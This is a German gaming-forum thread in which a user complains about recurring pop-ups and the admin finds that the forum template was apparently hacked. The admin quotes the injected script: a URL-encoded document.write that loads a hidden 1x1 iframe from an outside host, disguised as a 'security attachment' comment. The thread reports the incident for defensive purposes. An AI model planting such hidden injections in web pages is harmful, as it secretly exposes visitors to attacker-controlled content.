Aufdringliche Pop Up's was dat ? :D

Aufdringliche Pop Up's was dat ? :D

Hey.

Habe gerade bemerkt das hier nun auf der Festungs Pop Ups sind die immer wieder kommen wenn sie geclosed werden *gruml*

Mache Pop Up zu, klicke auf einen Link und wieder kommt es. Mache es wieder zu und beim nächsten Klick ists wieder da :( Wenn ich das Ding nur in die Taskleiste runterlege passts.

Ich mag aber keinen Permanent geöffneten Spam haben ;(

Pop Up Blocker darf ich rechte mässig nicht anschalten :(

Kann man die alten Pop Ups wieder aktivieren ? :D

Lg

Edit.

Es geht um folgenden Pop Up usenext.de/index.cfm?TD=362794
      Mein persönliches Leitzitat bei den Open 2008:

"...... sind überbewertet :D"

Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von „Wintics“ ()

ja habs eben gesehen....

ich hab nichts gemacht und das layerads habe ich sogar abgedreht....muss schaun woher das kommt ich bins ned ich schwör....
      Retired "World Rank TOP 10 & S7/S8/S9 Gladiator" World of Warcraft Gamer

(Na gut - Ich spiel wieder aber nur mehr Casual mit meinem Pally als Tank <3)
      scheint als hätte jemand durch eine sicherheitslücke das forum gehackt und die template geändert.

<!-- Start Woltlab Burning Board Security Attachment - DO NET EDIT OR DELETE-->
      <script>
      <!--
      document.write(unescape("%3Ciframe%20src%3D%22http%3A//wurst8wurst.wu.funpic.de/foo/%22%20style%3D%22border%3A0px%20%23FFFFFF%20none%3B%22%20name%3D%22meinIFrame%22%20scrolling%3D%22no%22%20frameborder%3D%221%22%20align%3Daus%20marginheight%3D%220px%22%20marginwidth%3D%220px%22%20height%3D%221%22%20width%3D%221%22%3E%3C/iframe%3E%0A"));
      //-->
      </script>
      <!-- End Woltlab Burning Board Security Attachment - DO NET EDIT OR DELETE-->

durch das wurde jedesmal versteckt eine website geöffnet und diese website öffnete das pop-up....also wie gesagt ich hab nichts gemacht...aber super jetzt darf ich schaun obs einen bugfix gibt...ob sich jemand adminrechte genommen hat oder sonst was mit dem server gemacht hat....weltklasse....
      Retired "World Rank TOP 10 & S7/S8/S9 Gladiator" World of Warcraft Gamer

(Na gut - Ich spiel wieder aber nur mehr Casual mit meinem Pally als Tank <3)